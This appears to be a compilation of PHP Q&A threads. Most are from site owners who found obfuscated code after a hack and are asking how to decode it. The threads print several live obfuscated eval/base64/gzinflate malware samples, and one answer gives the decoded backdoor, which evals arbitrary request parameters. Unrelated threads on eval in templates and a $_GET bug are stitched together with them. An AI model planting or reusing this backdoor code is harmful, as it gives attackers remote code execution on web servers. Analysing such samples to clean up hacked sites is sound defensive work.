I'm maintaining a PHP site that is very old and very funky.
Last night the site got hacked. I found this one file that I'm not sure if its from the hackers or from the aforementioned funkiness. Does anyone know how I can decode this:
<?php
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B");
?>
thanks,
Jack
Replace eval to echo. Repeat
http://pastebin.com/3X2FcvW3
Related
I Have read a lot on the normal php eval with the base64_encoder and was able to decode much of the infected php files.
With that said, I have this one file that does not follow standard eval call and I would like some help from the community.
Can anyone decode and/or tell me whats happening in the code?
Thanks,
--Eric
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnBvKi9ldmFsLypGUSZRX00qLygvKk56SiovYmFzZTY0X2RlY29kZS8qPDU+cyovKC8qTVl5YnMqLydMeW91U
EZJcUwybG1MeXBiY0h0aFZTb3ZLQzhxZCcvKndLc2Q/PGgqLy4vKllcdkgqLycweHVYRFJvTkNvdmFYTnpaWFF2S2sxTVBDb3ZLQycvKiF9Z1sqLy4vKiBrVlQqLyc4cWRYMHJLaThrWDFKRlVWVkZVMVF2S2
54Mk9DdCcvKjlRSG1Ta1FIKi8uLypFYlMuaCovJ2VNRHM4S2k5Ykx5cHNkSFlxTHlkakp5OHFkMmRHJy8qQUI5Ki8uLypxcyFIZU4qLydlQ292TGk4cVFsVXpObElxTHlkdUp5OHFjRGw0SScvKiY6ZSovLi8
qSlVxKi8nVU51S2k4dUx5b3hYQ1o2S2k4bmVTY3ZLbU10Sz'/*0B>.'&CK*/./*W1H*/'MnLypxcFpJKi8uLypBKWVTKi8nQlNLaTh1THlwa2JqRTFKVG9xTHlkemNTY3ZLa2QnLypgZj5zZTgqLy4vKjlENT
FcTyovJ0ROVGxWS2k5ZEx5cFRORXc1S2k4dkttaytXVE1vJy8qOmBaRUtlJkUqLy4vKlVILjspZSovJ1pTb3ZLUzhxT1RCbFVsWlZLaTh2S2xaSmRTVkpmJy8qVzpMa2hUKi8uLyo1cTNmdT8qLydDb3ZLUzh
xTlZvM0ppb3ZaWFpoYkM4cVp5MWNTMCcvKmheXTtbICovLi8qTC5SS2JZKi8nY3FMeWd2S21KNFZVNHllU292YzNSeWFYQnpiR0YnLypTS2MuJSovLi8qb3MwXjUySHsqLyd6YUdWekx5cGVWVjUzYnlvdktD
OHFKMk00SjBvcScvKlJrSCEqLy4vKk41JjkqLydMeVJmVWtW'/*Ju%:AN*/./*0\`a Z=*/'UlZVVlRWQzhxUUNoZGF5b3ZXeThxTCcvKjw8J3guaCovLi8qbixXKi8nV1JXZXpKSFB6QXFMeWRqYmljdktpMX
JlVkpKS2knLyotVS5zKi8uLyogUl5OKi8nOHVMeXBFVnpKYVoyRXFMeWQ1YzNFbkx5bzRTMFknLypjWmsqLy4vKjNkeWVMKi8naElEb3lRU292WFM4cU5peDZkU292THlwdlNVSngnLyonQVJWdyl1Ki8uLyp
eX1pKOmZ2Ki8nVVNvdktTOHFNV0JqS1V3cUx5OHFiMVU4T2tzcUwnLypUdlQrJkYqLy4vKmtFPDNmISovJ3lrdktsVkllMnNsS2k4dktsWmhVaTVUS3lvdk95OHFKbHhoZlN4MEtpOD0nLypaKWVePyovKS8q
J2tYKi8vKmsmViovKS8qMWdFVyovLyo8OHhObSovOy8qXW8/Ki8='/*L,}I*/)/*8Oyj*//*uEGgU*/)/*+LT*//*Q?.e*/;/*oGCkBv*/ ?>
If you go all the way down the rabbit hole, you get the following command.
if(isset($_REQUEST['cnysq']))eval(stripslashes($_REQUEST['cnysq']));
If you open the code up in a visual editor, you'll see there are a lot of comments. Remove those, and you'll see that it's a bas64 encoded string.
Decode that, and you'll see more of the same.
Keep removing comments and concatenating strings and after about 3 levels, you get to this point.
It's just a bunch of PHP comments in there, e.g. from the first line:
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnB etc...
^^^^^^^ ^^^^^^^^^^^ ^^^^^^^^ ^^^^^^^^^ ^^^^^^^--comments
is really just
<?php eval(base64_decode('LyPSnB etc...
I am trying to create a dynamic FAQ page. I have the following phtml sample :
<div id="faq">
<!-- Start FAQ "Navigation" -->
<div class="faqBox">
<? foreach($this->aFAQ as $k => $val) : ?>
<?= ($val['mQuestion']); ?>
<?= ($val['mAnswer']); ?>
<? endforeach; ?>
</div>
</div>
Which outputs as follows:
For additional payment options - check or money order, please contact us at iBrandingLevel == 2 ? $this->oStore->getSuppPhone()." Monday to Friday ".$this->oStore->getSuppHoursOpen()." - ".$this->oStore->getSuppHoursClose()." ".$this->oStore->getSuppTimeZone() : "(888) 455-3237 x2 from Monday to Friday 8:00am - 4:30pm MST/Arizona."; ?>
The above text is just the first $val['mAnswer'] (I didnt include the question as that is working properly).
The html is being rendered however obvoiusly the php isn't. the <? and ?> are being removed and just code is displaying. Is there a fix for this? or is my approach fundamentally wrong.
thanks
Your approach is fundamentally wrong, you are outputting PHP code as if it was HTML text and try to execute it.
It is possible to execute code from a string, you can look at the Eval method (http://php.net/manual/fr/function.eval.php) in PHP, but it is not recommended to do this. There are better ways to resolve your specific issues than to output PHP code directly.
What you could do is send a few variables to the view, and use if conditions there.
You could also prepare the full string you need before the view and then all that would be needed is to display it.
To elaborate a little about Eval :
1- If the code you execute within the Eval comes from a user, it is extremely dangerous.
2- If not, there is very often a better solution to the problem, using Eval makes it harder to debug.
Actually, I'm not sure I should answer this.
First, the answer to your request is the mixed eval ( string $code ) php function.
Second, FORGET IT. IMHO, this could be one of the most dangerous things you could think in.
Thanks everybody for the input and resulting discourse. The php code that was being stored in the database was not being input by users, it was all completely internal, however it still shouldn't be there.
I ultimately went through the database and set a %%variablename%% in place of the php code and then upon retrieval I wrote a script that would:
preg_replace("/\%\%variablename\%\%/", $desiredPhpcode, dbRetrievedString).
all instances of %%variablename%%.
It seemed the safer and more sound approach. I don't know if this is an IDEAL approach that anybody else could benefit from if caught in this circumstance or if it 'just works', but I thought I would share.
Thanks Again for the input it helped enormously
PHP is server-side language. Outputting it to client does not make any sense, as there is no one to interpret it.
I have a file that I'm trying to decode but I'm not sure the best way to go about doing it. I've tried putting it through a few online tools but haven't had much luck...the code looks like this:
<?php
$zAkSoSavjFOn='jumbledcodeinhere';
$THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';
$DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr);
$WnJYuMUwKmRxBh=str_rot13($DzbOntpeGhMcan);
eval($WnJYuMUwKmRxBh);
?>
In all my playing I managed to extract the following with a php script:
eval(gzinflate(base64_decode(strrev($zAkSoSavjFOn))));
Could someone point me in the right direction on going about this process? Any help would be appreciated. :)
The "jumbled code" is gzipped, base64-encoded, reversed PHP code that is almost certainly malicious.
Replace eval with echo and see what it gives you, that's what the code that is trying to run is.
I just noticed today that I have got lots of spam links in my wordpress blog. I just found a file which contains
<?php eval (chr(101).chr(114)...
Its very very long string. Can someone tell me how can I decode this to see what it does? So that I can try to remove the spam links?
Thanks.
Just replace eval by echo and have a look at the generated output
<?php echo (chr(101).chr(114)...
Instead of executing (eval) you can just echo out what it says, preferrably with htmlspecialchars if you execute it via browser:
<?php echo htmlspecialchars(chr(101)...
odds are though that you won't see anything understandable, since it is probably encoded in more ways than one.
Simply replace eval with echo:
<?php echo (chr(101).chr(114)...
Besides that, you most likely need to reinstall whatever you have on your webspace as you obviously have been hacked. Ensure that you use the most recent version of Wordpress and all other software you are running to prevent this from happening again.
So I'm trying to do something extremely simple, and after reading through forums, and researching on google I still can't figure out why this is not working. But this is mostly like because I'm still a very much noobie programmer. I'm trying to send information through a url, and having a script pick it up using the $_GET super global.
Here's the link code, in a file called TESTFORM.php:
<p>
Here's a link:
ID
</p>
This is the TESTGET.php script:
<?php
if (isset($_GET['id']))
echo 'it is set<br />';
else
echo 'it is not set<br />';
?>
This yields in a "It is not set" appearing on the page every time. Any thoughts? Are there ghosts in my computer ruining my code? Thanks for taking the time to read through this! Happy coding!
I'm no PHP programmer, but I do know from HTML that computers (especially file names) don't "like" spaces. Try removing the spaces in the id = 5 code.
Your problem is the extraneous space here around the URL parameters:
ID
That will result in PHP seeing the parameter as $_GET["id_"]. The space gets converted into an underscore.
It's always best to use var_dump($_GET); or var_dump($_REQUEST) when you run into such problems. Secondarily it is sometimes helpful to get rid of isset in such cases. Albeit you have a custom error message in place of the language notices intended just for that.
Have you tried to remove spaces in your link?
ID
Code seems fine at a glance, have you tried removing the spaces in
?id = 5 to ?id=5